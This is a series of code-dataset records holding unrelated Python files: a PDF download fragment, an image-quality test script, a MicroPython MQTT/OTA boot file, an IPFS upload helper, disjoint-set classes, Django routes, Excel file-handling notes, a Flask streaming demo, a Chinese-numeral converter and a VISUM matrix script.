'https:'+pdf_URL\nprint('PDF address:', pdf_URL)\nname = re.search(re.compile('fdp.*?/'),pdf_URL[::-1]).group()[::-1][1::] # match \"fdp\" (\"pdf\" backwards) in the reversed URL, reverse back, drop the leading slash\nprint('PDF file name:', name)\nprint('Saved in:', os.getcwd())\nprint('\\nDownloading')\nr = requests.get(pdf_URL, stream=True)\nwith open(name, 'wb') as f:\n for chunk in r.iter_content(chunk_size=32):\n f.write(chunk)\nprint('Download finished!')","sub_path":"04. 
Python学习/用爬虫在sci-hub上下载文献.py","file_name":"用爬虫在sci-hub上下载文献.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"390045328","text":"import os\nimport cv2\nimport sys\nimport glob\nsys.path.append('model/')\nfrom model.PieAPPv0pt1_KERAS import PieAPP\nimport argparse\nimport tensorflow as tf\ntf.logging.set_verbosity(tf.logging.ERROR)\n\n####### check for model and download if not present\nif not len(glob.glob('weights/PieAPP_model_v0.1.ckpt.*')) == 3:\n\tprint (\"downloading dataset\")\n\tos.system(\"bash scripts/download_PieAPPv0.1_TF_weights.sh\")\n\tif not len(glob.glob('weights/PieAPP_model_v0.1.ckpt.*')) == 3:\n\t\tprint (\"PieAPP_model_v0.1.ckpt files not downloaded\")\n\t\tsys.exit()\n \ndef compare_PieAPP(imageRef, imageA, gpu_id='', sampling_mode='sparse'):\n assert sampling_mode=='sparse' or sampling_mode=='dense', 'sampling_mode must be sparce or dense, received '+sampling_mode\n \n os.environ['CUDA_VISIBLE_DEVICES'] = gpu_id\n \n if sampling_mode == 'sparse':\t\n stride_val = 27\n if sampling_mode == 'dense':\n stride_val = 6\n \n pieModel = PieAPP()\n pieModel.load_weights('weights/PieAPP_model_v0.1.ckpt.meta')\n return pieModel.predict(imageRef, imageA, strides=stride_val)\n \nif __name__=='__main__':\n ######## input args\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ref_path\", dest='ref_path', type=str, default='imgs/ref.png', help=\"specify input reference\")\n parser.add_argument(\"--A_path\", dest='A_path', type=str, default='imgs/A.png', help=\"specify input image\")\n parser.add_argument(\"--sampling_mode\", dest='sampling_mode', type=str, default='sparse', help=\"specify sparse or dense sampling of patches to compte PieAPP\")\n parser.add_argument(\"--gpu_id\", dest='gpu_id', type=str, default='', help=\"specify which GPU to use (don't specify this argument if using CPU only)\")\n \n args = parser.parse_args()\n \n # open images\n imageRef = cv2.imread(args.ref_path)\n imageA = cv2.imread(args.A_path)\n \n compared = compare_PieAPP(imageRef, imageA, args.gpu_id, args.sampling_mode)\n \n print ('PieAPP value of '+args.A_path+ ' with respect to: '+str(compared))","sub_path":"test_PieAPP_KERAS.py","file_name":"test_PieAPP_KERAS.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"528323002","text":"import time, machine, update, wifisettings, nodesettings, lib.requests, lib.logger, lib.requests, lib.timew, time, os, machine\nfrom umqtt.robust import MQTTClient\nfrom machine import Pin, WDT\nled = Pin(2, Pin.OUT)\nled.off()\n\nt = lib.timew.Time(time=time)\n\n# Configure Logger\nlogger = lib.logger.config(enabled=nodesettings.settings['debug'], include=nodesettings.settings['logInclude'], exclude=nodesettings.settings['logExclude'], time=t)\nlog = logger(append='boot')\nlog(\"The current time is %s\" % t.human())\n\nmqtt_pth = nodesettings.settings['controllerName']\nclient = MQTTClient(mqtt_pth, \nwifisettings.settings['mqtt_ip'], \nport=wifisettings.settings['mqtt_port'])\n\nmq_c = False\nfor i in range(1):\n try:\n client.connect()\n mq_c = True\n except:\n log('MQTT: cannot connect')\n led.on()\n time.sleep(1)\nif not mq_c:\n log ('MQTT: giving up, resetting')\n time.sleep(1)\n machine.reset()\nlog('MQTT: connected OK')\nled.off()\n\ndef mqtt_pub(tag, data, retain=False):\n \"\"\"publish a message to the MQTT broker\"\"\"\n client.publish(mqtt_pth+\"/\"+tag, \n 
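# payload and retain flag (comment added for clarity): with retain=True the broker keeps the last message and hands it to clients that subscribe later\n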
data, retain)\n\ndef mqtt_sub(sub_callback):\n \"\"\"subscribe to MQTT topic given by controllername and register a callback\"\"\"\n client.set_callback(sub_callback)\n client.subscribe(mqtt_pth+\"/#\")\n print(\"MQTT SUBSCRIBED TO: \", repr(mqtt_pth+\"/#\"))\n \ndef mqtt_ping():\n \"\"\"ping the MQTT broker\"\"\"\n client.ping()\n\nloggerOta = logger(append='OTAUpdater')\n\nio = update.IO(os=os, logger=loggerOta)\ngogs = update.Gogs(\n remote=nodesettings.settings['gogsRemote'],\n branch=nodesettings.settings['gogsBranch'],\n token=nodesettings.settings['gogsToken'],\n requests = lib.requests,\n io=io,\n logger=loggerOta,\n)\nupdater = update.OTAUpdater(io=io, gogs=gogs, logger=loggerOta, machine=machine)\n\ntry:\n updater.update()\n log('OTA update OK')\n mqtt_pub(\"boot/status\", \"OTA_OK\")\n led.off()\nexcept Exception as e:\n log('Failed to OTA update:', e)\n mqtt_pub(\"boot/status\", \"OTA_error\")\n led.on()\n\n\nenv = {}\nenv.update(nodesettings.settings)\nenv['requests'] = lib.requests\nenv['log'] = logger(append='main')\nenv['time'] = t\nenv['updater'] = updater\n\nenv['wdt'] = WDT(timeout=5000) # watchdog timer. If feed() is not called every 5000ms (max) the system will reset.\n # the main loop (within src.main.start) calls feed() periodically but will stop doing so in case of an exception\n # If communication to the MQTT broker fails, an exception will occur.\n # Thus, the system can be remote-reset by stopping the MQTT broker.\n # Due to measures in micropython-ota-updater-gogs/src/main.py, the system will then boot-loop \n # until the MQTT server is accesible again, and then check for an OTA update.\n # In summary, after an update of the node code has been published on Gogs, nodes can be forced to load it \n # by stopping the MQTT broker service for a short while. 
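\n #\n # A minimal sketch (added here; the real loop lives in src.main.start, so its\n # exact shape is an assumption) of the feed pattern described above:\n #\n # while True:\n # env['wdt'].feed() # at least once every 5000 ms\n # env['mqtt_check_msg']() # raises if the broker is unreachable -> reset\n # time.sleep(1)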
\n\n\nenv['mqtt_pub'] = mqtt_pub\nenv['mqtt_ping'] = mqtt_ping\nenv['mqtt_sub'] = mqtt_sub\nenv['mqtt_check_msg'] = client.check_msg\nenv['wdt'].feed() # first food for watchdog\n\nlog('launching src.main.start()')\nimport src.main\nsrc.main.start(env)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"448575223","text":"import pathlib\n\nimport httpx\nfrom loguru import logger\n\nfrom .config import CONFIG\nfrom .Messenger import messenger\nfrom .utils import async_time_execution, get_headers, service_is_up\n\nIPFS_GATEWAY_ADDRESS: str = CONFIG.ipfs_gateway.ipfs_server_uri\n\n\n@async_time_execution\nasync def publish_file(rfid_card_id: str, file_path: pathlib.Path) -> tuple[str, str]:\n \"\"\"publish a provided file to IPFS using the Feecc gateway and return it's CID and URL\"\"\"\n if not CONFIG.ipfs_gateway.enable:\n raise ValueError(\"IPFS Gateway disabled in config\")\n\n if not service_is_up(IPFS_GATEWAY_ADDRESS):\n message = \"IPFS gateway is not available\"\n messenger.error(\"IPFS шлюз недоступен\")\n raise ConnectionError(message)\n\n file_path = pathlib.Path(file_path)\n headers: dict[str, str] = get_headers(rfid_card_id)\n base_url = f\"{IPFS_GATEWAY_ADDRESS}/publish-to-ipfs\"\n\n async with httpx.AsyncClient(base_url=base_url, timeout=None) as client:\n if file_path.exists():\n with file_path.open(\"rb\") as f:\n files = {\"file_data\": f}\n response: httpx.Response = await client.post(url=\"/upload-file\", headers=headers, files=files)\n else:\n json = {\"absolute_path\": str(file_path)}\n response = await client.post(url=\"/by-path\", headers=headers, json=json)\n\n if response.is_error:\n messenger.error(f\"Ошибка шлюза IPFS: {response.json().get('detail', '')}\")\n raise httpx.RequestError(response.json().get(\"detail\", \"\"))\n\n assert int(response.json().get(\"status\", 500)) == 200, response.json()\n\n cid: str = response.json().get(\"ipfs_cid\")\n link: str = response.json().get(\"ipfs_link\")\n assert cid and link, \"IPFS gateway returned no CID\"\n\n logger.info(f\"File '{file_path} published to IPFS under CID {cid}'\")\n\n return cid, link\n","sub_path":"src/feecc_workbench/ipfs.py","file_name":"ipfs.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"523534844","text":"class DisjointSetForest:\n \"\"\"Forest representation of Disjoint Set.\n \"\"\"\n class _Node:\n \"\"\"Internal Node\n \"\"\"\n def __init__(self, data, rank=0):\n self.data = data\n self.rank = rank\n self.next = self\n self.parent = self\n\n def __repr__(self):\n return f\"(({self.data}) {self.rank})\"\n\n def make_set(self, data):\n \"\"\"Make a new set and return it.\n\n It just create a tree with a root node with the data.\n \"\"\"\n return self._Node(data)\n\n def find_set(self, node):\n \"\"\"Find the representative of the set of the node.\n \"\"\"\n if node is not node.parent:\n node.parent = self.find_set(node.parent)\n\n return node.parent\n\n def union_set(self, node1, node2):\n \"\"\"Union two set of the two nodes and return it.\n \"\"\"\n if node1 is node2:\n return self.find_set(node1)\n\n root1 = self.find_set(node1)\n root2 = self.find_set(node2)\n\n if root1 is root2:\n return root1\n\n if root1.rank < root2.rank:\n root1, root2 = root2, root1\n\n root2.parent = root1\n root1.next, root2.next = root2.next, root1.next\n\n if root1.rank == 
root2.rank:\n root1.rank += 1\n\n return root1\n\n def print_set(self, node, *, sep=' ', end='\\n'):\n \"\"\"Print the node in the set with unordered.\n \"\"\"\n tmp = node\n\n while tmp.next is not node:\n print(tmp.data, end=sep)\n tmp = tmp.next\n\n print(tmp.data, end=end)\n\n\nclass DisjointSetForestWithList:\n \"\"\"Forest representation of Disjoint Set.\n \"\"\"\n def __init__(self, *, size):\n self.parent = [-1 for i in range(size)]\n self.next = [-1 for i in range(size)]\n self.rank = [-1 for i in range(size)]\n\n def make_set(self, data):\n \"\"\"Make a new set and return it.\n\n It just create a tree with a root node with the data.\n \"\"\"\n self.parent[data] = data\n self.next[data] = data\n self.rank[data] = 0\n\n def find_set(self, node):\n \"\"\"Find the representative of the set of the node.\n \"\"\"\n if node != self.parent[node]:\n self.parent[node] = self.find_set(self.parent[node])\n\n return self.parent[node]\n\n def union_set(self, node1, node2):\n \"\"\"Union two set of the two nodes and return it.\n \"\"\"\n root1 = self.find_set(node1)\n root2 = self.find_set(node2)\n\n if root1 == root2:\n return root1\n\n if self.rank[root1] < self.rank[root2]:\n root1, root2 = root2, root1\n\n self.parent[root2] = root1\n self.next[root1], self.next[root2] = self.next[root2], self.next[root1]\n\n if self.rank[root1] == self.rank[root2]:\n self.rank[root1] += 1\n\n return root1\n\n def print_set(self, node, *, sep=' ', end='\\n'):\n \"\"\"Print the node in the set with unordered.\n \"\"\"\n tmp = node\n\n while self.next[tmp] != node:\n print(tmp, end=sep)\n tmp = self.next[tmp]\n\n print(tmp, end=end)\n","sub_path":"algorithms/disjoint_set/forest.py","file_name":"forest.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"649865791","text":"from django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom . 
import views\n\napp_name = 'app'\n\nurlpatterns = [\n\tpath('', views.home, name='home'),\n\tpath('vlogin/', views.vlogin, name='vlogin'),\n\tpath('slogin/', views.slogin, name='slogin'),\n\tpath('ssignup/', views.ssignup, name='ssignup'),\n\tpath('vsignup/', views.vsignup, name='vsignup'),\n\tpath('ind/', views.ind, name='ind'),\n\tpath('shg/', views.shg, name='shg'),\n\tpath('vdashboard/', views.vdashboard, name='vdashboard'),\n]","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"469633420","text":"#!/sur/bin/python\n# -*-coding:utf-8-*-\n\n#open(): 打开文件,txt文件,Excel\n#如何查看代码\n# 1.选中\n# 2.Ctrl+ b\n\n#open()\n\n\"\"\"\n常用参数\n1.file: 文件的名字,a.txt b.excel\n2.mode='r' 读取文件的模式 r——读取模式 w——写入模式 a——追加写入模式\n b——二进制写入 + 追加 读写\n3。encoding=None 指定文件的编码方式 utf - 8 gbk\n\"\"\"\n\n\n#写入过程\n# f = open(\"b.txt\",mode=\"w\",encoding=\"utf-8\")\n# # write() 写入 传入字符串 想写入的文字\n# f.write(\"hello,python \\nsdfsafsdfs\")\n# # close() 关闭\n# f.close()\n\n\n#读取文件\n# f = open(\"a.txt\",mode=\"r\",encoding=\"utf-8\")\n# # read() 读取文件中所有内容\n# text=f.read()\n# print(text)\n# f.close()\n\n# #例子 ;写入\n# a = [\"a\",\"b\",\"c\"]\n# f = open(\"a.txt\",mode=\"w\",encoding=\"utf-8\")\n# for i in a:\n# f.write(i+\"\\n\")\n# f.write(f\"{i}\\n\")\n# f.write(\"a\\n\"\"b\\n\"\"c\\n\")\n# f.close()\n\n\n# f = open(\"b.txt\",mode=\"r\",encoding=\"utf-8\")\n#readlines(n) 每次读取一行, n有数值,只读取数值的行数\n# text= f.readlines(1) # 返回一个列表\n# c =[]\n# for j in text:\n# c.append(j.strip())\n# print(c)\n# f.close()\n# print(text)\n#\n#\n# def wj(x):\n# f = open(file=x, mode=\"r\", encoding=\"utf-8\")\n# print(f.readlines(2))\n# b = []\n# for i in f:\n# b.append(i.strip())\n# f.close()\n# return f\n# wj(\"a.txt\")\n\n\n\n\n\n\n\n\n\n\n\n\n# python读取Excel表格中的数据,需要使用的第三方包(pip install excel)\nimport xlrd\n\n# 打开Excle文件\n# d = xlrd.open_workbook(filename=\"12.xls\")\n# 获取Excel表格,返回的是一个包含所有excel的表格\n# 假设文件中存在两个excel表,那么列表中【‘sheetl’‘sheet2’】\n# table = d.sheets()[0]\n# # 获取表中的数据 row_values() 获取整行的数据,必须指定获取的行号\n# x = table.row_values(1,0) # 行从0开始,后一个是从那一列开始\n# y = table.row_values(0,1)\n#print(x)\n# print(y)\n# #\n# # 获取某个单元格的值 先通过row获取某一行,返回列表,在通过列表索引获取元素,通过【.value】获取到具体的值\n# dan = table.row(0)[1].value\n#print(dan)\n# # # 获取某一列的值, 先通过col获取某一列,返回列表,在通过列表索引获取元素,通过【.value】获取到具体的值\n# lie = table.col(1)[1].value\n#print(lie)\n# # # 获取某一行的某一列的值\n# huoqu = table.cell(0,1).value\n# print(huoqu)\n# # # 获取行数\n# hang = table.nrows\n#print(hang)\n# # # 获取列数\n#lieshu = table.ncols\n# print(lieshu)\n# # # 通过行数获取所有的数据\n# for i in range(hang):\n# print(table.row_values(i))\n# #\n# # # 通过列数获取所有的数据\n# b = table.col_values(1) # 获取整列的数据\n# print(b)\n\n#for j in range(lieshu):\n #print(table.col_values(j))\n#\n# #打印/输出 excel表得名字 d 代表打开excel文件\n#print(d.sheet_names()) #找出文件中所有表的名字\n#\n#\n# # 通过索引获取表\n# # 假设一个文件存在两个表sheet1,sheet2, sheet_by_index(): 0 打开的就是sheet1\n# table = d.sheet_by_index(0)\n# print(table)\n\n\n\n\n# 打开某个表格,并将所有的内容保存到txt文档中\n# class Excel(object):\n# def __init__(self,name,num):\n# self.d = xlrd.open_workbook(filename=name) # 打开文件\n# # 使用某一张表\n# self.t = self.d.sheets()[num] #d.sheet_by_index(0) 两种方法#shuju = dui.data()#shuju =#shuju = dui.data() dui.data()\n# # data 方法的作用,获取一张表中的所有的数据\n# def a(self):\n# # 将所有数据装到一个列表中\n# biao = []\n# n = self.t.nrows # 获取行数\n# for i in range(n):\n# #print(self.t.row_values(i))\n# biao.append(self.t.row_values(i))\n# return biao\n# class Txt(Excel):\n# def write_data(self):\n# f = 
open(file=\"wen.txt\",mode=\"w\",encoding=\"utf-8\")\n# shuju = self.a() #shuju = dui.data()\n# for i in shuju:\n# print(i)\n# for j in i:\n# #print(j)\n# f.write(f\"{str(j)} \" '\\t')\n# f.write(\"\\n\")\n# t1 = Txt(\"12.xls\",0)\n# t1.write_data()\n\n\n\n# 向excel文件中写入数据 xlwt pip install xlwt\n# import xlwt\n# # 新建一个excel文件\n# d = xlwt.Workbook()\n# # 新建一个excel表 add_sheet(\"工作表的名字\") 必填\n# table = d.add_sheet(\"表1\")\n# # 写入数据到excel表中\n# # 一次写入一个单元格 第一个0是行,第二个0是列\n# table.write(0,0,\"张三\")\n# table.write(0,12,\"李四\")\n# # 保存文件 save(\"文件名\") 必填\n# d.save(\"7,3.xls\")\n\n\n# import xlwt\n#\n# a = [[\"序号\",\"名字\",\"年龄\",\"性别\"],[\"1\",\"王二\",\"12\",\"男\"],[\"2\",\"张三\",\"23\",\"女\"],[\"3\",\"李四\",\"12\",\"男\"],\n# [\"4\" ,\"赵六\",\"32\",\"女\"]]\n# d = xlwt.Workbook()\n# table = d.add_sheet(\"表1\")\n# for i in range(len(a)):\n# for j in range(len(a)-1):\n# table.write(i,j,a[i][j])\n# d.save(\"例子.xls\")\n\n\nimport xlwt\n# class A(object):\n# c = xlwt.Workbook() #新建excel文件\n# def __init__(self,biao,shuju):\n# self.table = self.c.add_sheet(\"表\") # 新建表\n# self.biao = biao\n# self.shuju = shuju\n# def b(self):\n# for i in range(len(self.shuju)):\n# for j in range(len(self.shuju[i])):\n# self.table.write(i,j,self.shuju[i][j])\n# self.c.save(self.biao) # 保存文件\n#\n# q = A(\"2.xls\",[['序号', '名字', '年龄', '性别'], [1.0, '张三', 20.0, '男'], [2.0, '李四', 19.0, '男'], [3.0, '王五', 18.0, '女'], [4.0, '赵信', 16.0, '女']])\n# q.b()\n\n\n\n\n\n\n\n\n\n#导入 (跨文件夹)\n# from 文件夹名字 import 脚本名\n\n#同文档导入\n# 第一种\n#from a import 脚本名 #导入全部 from a import *\n# 第二种\n#from 文件路径 import * # 文件路径= python.A.aa eg: from python.A.aa import * print(a) print(b)\n\n\n#将九九乘法表写入到txt文件\nclass A(object):\n def __init__(self,x):\n self.x = x\n self.f = open(\"c.txt\",mode=\"w\",encoding=\"utf-8\")\n def b(self):\n for i in range(1,self.x):\n for j in range(1,i+1):\n self.f.write(f\"{j}*{i}={i*j} \\t\")\n self.f.write(\"\\n\")\na = A(10)\na.b()\n\n\n\n\n\"\"\"\n#将九九乘法表写入到Excel文件\nimport xlwt\nclass A(object):\n def __init__(self,x):\n self.x = x\n # 新建一个excel文件\n self.d = xlwt.Workbook()\n # 新建一个excel表 必填\n self.table = self.d.add_sheet(\"表1\")\n def jiu(self):\n for i in range(1,self.x):\n for j in range(1,i+1):\n self.table.write(i-1,j-1,f\"{j}*{i}={i*j}\")\n # # 保存文件 save(\"文件名\") 必填\n self.d.save(\"99.xls\")\n\na = A(10)\na.jiu()\n\"\"\"\n\nimport xlwt\n# class A(object):\n# def __init__(self,x,y):\n# self.x = x\n# self.y = y\n# self.a = self.x + self.y\n# class B(A):\n# def b(self):\n# print(self.a)\n# c =B(1,2)\n# c.b()\n\n\n# class A(object):\n# def __init__(self,x):\n# self.x = x\n# self.d=xlwt.Workbook()\n# self.table = self.d.add_sheet(\"99\")\n# def b(self):\n# for i in range(1,self.x):\n# for j in range(1,i+1):\n# self.table.write(i-1,j-1,f\"{j}*{i}={i*j}\")\n# self.d.save(\"99.xls\")\n# a = A(10)\n# a.b()","sub_path":"python文件/资料/操作文件及表格.py","file_name":"操作文件及表格.py","file_ext":"py","file_size_in_byte":7637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"295089580","text":"# -*- coding: utf-8 -*-\n# @Author: Alexander Sharov\n\n\ndef ancestors(child, p_tree):\n result = []\n result.append(child)\n while child in p_tree:\n child = p_tree[child]\n result.append(child)\n return result\n\n\np_tree = dict()\nn = int(input())\nfor i in range(n - 1):\n child, parent = input().split()\n p_tree[child] = parent\n\nm = int(input())\nfor i in range(m):\n child_1, child_2 = input().split()\n ancestors_for_1 = set(ancestors(child_1, p_tree))\n for ancestor in ancestors(child_2, p_tree):\n if 
ancestor in ancestors_for_1:\n print(ancestor)\n break\n","sub_path":"python_tutor/11/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35260152","text":"#!/usr/bin/env python3\n\nimport time\n\nfrom flask import Flask, Response\n\n\napp = Flask('generator')\n\n\n# fails\n# @app.route('/')\ndef gen():\n\tfor i in range(10):\n\t\tyield str(i)\n\t\ttime.sleep(i)\n\n@app.route('/')\ndef gen():\n\tdef gen():\n\t\tfor i in range(10):\n\t\t\tyield '%s\\n' % i\n\t\t\ttime.sleep(1) # simulate an expensive operation\n\treturn Response(gen(), mimetype='text/plain')\n\nif __name__ == '__main__':\n\tapp.run(host='localhost', port=8000)\n","sub_path":"flask_generator.py","file_name":"flask_generator.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"603056745","text":"# -*- coding:utf-8 -*-\nimport os\nimport os.path\nimport re\nimport codecs\n\nCN_NUM = {\n u'〇' : 0,\n u'一' : 1,\n u'二' : 2,\n u'三' : 3,\n u'四' : 4,\n u'五' : 5,\n u'六' : 6,\n u'七' : 7,\n u'八' : 8,\n u'九' : 9,\n\n u'零' : 0,\n u'壹' : 1,\n u'贰' : 2,\n u'叁' : 3,\n u'肆' : 4,\n u'伍' : 5,\n u'陆' : 6,\n u'柒' : 7,\n u'捌' : 8,\n u'玖' : 9,\n\n u'貮' : 2,\n u'两' : 2,\n}\nCN_UNIT = {\n u'十' : 10,\n u'拾' : 10,\n u'百' : 100,\n u'佰' : 100,\n u'千' : 1000,\n u'仟' : 1000,\n u'万' : 10000,\n u'萬' : 10000,\n u'亿' : 100000000,\n u'億' : 100000000,\n u'兆' : 1000000000000,\n}\n\nCN_POOLSTR=\"[u'〇'u'一'u'二'u'三'u'四'u'五'u'六'u'七'u'八'u'九'\" \\\n \"u'零'u'壹'u'贰'u'叁'u'肆'u'伍'u'陆'u'柒'u'捌'u'玖'\" \\\n \"u'貮'u'两'u'十'u'拾'u'百'u'佰'u'千'u'仟'u'万'u'萬'u'亿'u'億'u'兆']\"\n\n\n\ndef cn2dig(cn):\n lcn = list(cn)\n unit = 0 # 当前的单位\n ldig = [ ] # 临时数组\n\n while lcn:\n cndig = lcn.pop()\n\n if cndig in CN_UNIT:\n unit = CN_UNIT.get(cndig)\n if unit== 10000:\n ldig.append('w') # 标示万位\n unit = 1\n elif unit == 100000000:\n ldig.append('y') # 标示亿位\n unit = 1\n elif unit == 1000000000000: # 标示兆位\n ldig.append('z')\n unit = 1\n\n continue\n\n else:\n dig = CN_NUM.get(cndig)\n\n if unit:\n dig = dig * unit\n unit = 0\n\n ldig.append(dig)\n\n if unit == 10: # 处理10-19的数字\n ldig.append(10)\n\n ret = 0\n tmp = 0\n\n while ldig:\n x = ldig.pop()\n\n if x == 'w':\n tmp *= 10000\n ret += tmp\n tmp = 0\n\n elif x == 'y':\n tmp *= 100000000\n ret += tmp\n tmp = 0\n\n elif x == 'z':\n tmp *= 1000000000000\n ret += tmp\n tmp = 0\n\n else:\n tmp += x\n\n ret += tmp\n return ret\n\n # ldig.reverse()\n # print ldig\n # print CN_NUM[u'七']\n\nif __name__== '__main__':\n pass\n","sub_path":"chNum2Dig.py","file_name":"chNum2Dig.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338094080","text":"#! 
Python 3\n\nimport numpy\nimport Tkinter as Tk\nfrom VisumPy import helpers as helpers\n\n\n# Required date as an input\n\nclass window():\n def __init__(self):\n #Start root:\n self.root = Tk.Tk()\n self.root.attributes(\"-topmost\", True)\n\n #Label:\n Tk.Label(self.root,text=\"Set the required date You want to use to create the matrix\").pack()\n\n #Define object selector and pack it to the frame:\n self.textctrl=Tk.Entry(self.root)\n self.textctrl.insert(0,\"DD.MM.YYYY\")\n self.textctrl.pack()\n\n #Define buttons and pack it to the frame:\n self.button = Tk.Button(self.root, font=(\"Arial\", 10), text=\"OK\", command=self.ok)\n self.cancel_button = Tk.Button(self.root, font=(\"Arial\", 10), text=\"Cancel\", command=self.cancel)\n self.button.pack()\n self.cancel_button.pack()\n\n #Start window mainloop:\n self.root.mainloop()\n\n\n def ok(self):\n self.required_date = str(self.textctrl.get())\n if len(self.required_date) != 10:\n # tkMessageBox.showinfo(\"Title\", \"Please enter the date in the DD.MM.YYYY format.\")\n self.root.destroy()\n win = window()\n self.cont = True\n self.root.destroy()\n\n def cancel(self):\n self.cont = False\n self.root.destroy()\n\n\n#Start GUI:\nwin = window()\n\nwhile win.cont == True:\n\n required_date = win.required_date\n\n # Filter by the given date\n\n poi_filter = Visum.Filters.POIFilter(48)\n poi_filter.RemoveConditions()\n poi_filter.AddCondition(\"OP_NONE\", False, \"DATE\", 9, required_date, Position=-1)\n if poi_filter.UseFilter != True:\n poi_filter.UseFilter = True\n\n # Creating the clear matrix\n\n all_matrices = Visum.Net.Matrices.GetMultiAttValues(\"NO\", OnlyActive=False)\n new_matrix_no = all_matrices[-1][1] + 1 # Incrementing the last NO of matrix\n\n new_matrix = Visum.Net.AddMatrix(new_matrix_no, objectTypeRef=2, MatrixType=3)\n # objectTypeRef=2 - as for a zone-based matrix\n # MatrixType=3 - as for a demand matrix\n\n new_matrix.SetAttValue(\"NAME\", (\"Trip Requests_\" + str(required_date)))\n\n # Getting the matrix as an array\n\n new_matrix = helpers.GetMatrix(Visum, new_matrix_no)\n\n # Translation between zones no and array index\n\n zones = helpers.GetContainer(Visum, \"Zones\")\n zones_list = helpers.GetMulti(zones, \"NO\")\n zones_dict = {}\n i = 0\n for zone in zones_list:\n zones_dict[int(zone)] = i\n i += 1\n\n # Getting the trip requests for the filtered date\n\n trip_req_poi = helpers.GetContainer(Visum, \"POI: Trip Request\")\n trip_id = helpers.GetMulti(trip_req_poi, \"ID_INTERNA\", activeOnly=True)\n trip_type = helpers.GetMulti(trip_req_poi, \"O_D\", activeOnly=True)\n trip_zone = helpers.GetMulti(trip_req_poi, \"ZONE\", activeOnly=True)\n trip_passanger = helpers.GetMulti(trip_req_poi, \"TOTAL_PAS\", activeOnly=True)\n\n # O-D pair comparing\n for i in range(0, len(trip_id)/2):\n if trip_id[i] == trip_id[i+1]:\n if trip_type[i] == \"O\":\n origin_zone = trip_zone[i]\n j = i+1\n dest_zone = trip_zone[j]\n else:\n dest_zone = trip_zone[i]\n j = i + 1\n origin_zone = trip_zone[j]\n else:\n if trip_type[i] == \"O\":\n origin_zone = trip_zone[i]\n id_temp = trip_id[i]\n # First the D type POIs were imported and later the O type\n # due to that they are not pairs\n j = trip_id.index(id_temp, i+1, len(trip_id))\n dest_zone = trip_zone[j]\n else:\n dest_zone = trip_zone[i]\n id_temp = trip_id[i]\n j = trip_id.index(id_temp, i+1, len(trip_id))\n origin_zone = trip_zone[j]\n\n if origin_zone != 0 and dest_zone != 0:\n origin_row = zones_dict[origin_zone]\n destin_col = zones_dict[dest_zone]\n new_matrix[origin_row, 
destin_col] += (trip_passanger[i] + trip_passanger[j])\n\n # Setting the matrix using numpy array\n\n helpers.SetMatrix(Visum, new_matrix_no, new_matrix)\n win = window()","sub_path":"VISUM/Matrix_creation.py","file_name":"Matrix_creation.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"26493077","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport blog.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0006_auto_20150926_0833'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Media',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=250, unique=True, verbose_name='Название Видео', db_index=True, default='', blank=True)),\n ('title', models.CharField(verbose_name='Заголовок в браузере', max_length=250, blank=True)),\n ('image', models.ImageField(verbose_name='Видео', upload_to=blog.models.make_upload_path, default='', blank=True)),\n ('metakey', models.CharField(verbose_name='Ключевые слова', max_length=250, blank=True)),\n ('metadesc', models.CharField(verbose_name='Мета описание', max_length=250, blank=True)),\n ('slug', models.CharField(verbose_name='Урл', max_length=250, blank=True)),\n ('published', models.BooleanField(verbose_name='Опубликован', default=0)),\n ('ordering', models.IntegerField(verbose_name='Порядок сортировки', null=True, blank=True, default=0)),\n ('count_posts', models.IntegerField(verbose_name='Количество постов', null=True, blank=True, default=0)),\n ('parent', models.ForeignKey(null=True, blank=True, verbose_name='Родительская категория', to='blog.Media')),\n ],\n options={\n 'verbose_name': 'Видеотека',\n 'verbose_name_plural': 'Видеотеки',\n 'ordering': ['ordering'],\n },\n ),\n migrations.CreateModel(\n name='Video',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('name', models.CharField(verbose_name='Название', max_length=250, default='', blank=True)),\n ('video', models.FileField(verbose_name='Изображение', upload_to=blog.models.make_upload_path, default='', blank=True)),\n ('media', models.ForeignKey(null=True, blank=True, verbose_name='Галерея', related_name='c6', to='blog.Media')),\n ('post', models.ForeignKey(null=True, blank=True, verbose_name='Пост', related_name='c5', to='blog.Post')),\n ],\n options={\n 'verbose_name': 'Видео',\n 'verbose_name_plural': 'Видео',\n },\n ),\n ]\n","sub_path":"blog/migrations/0007_media_video.py","file_name":"0007_media_video.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 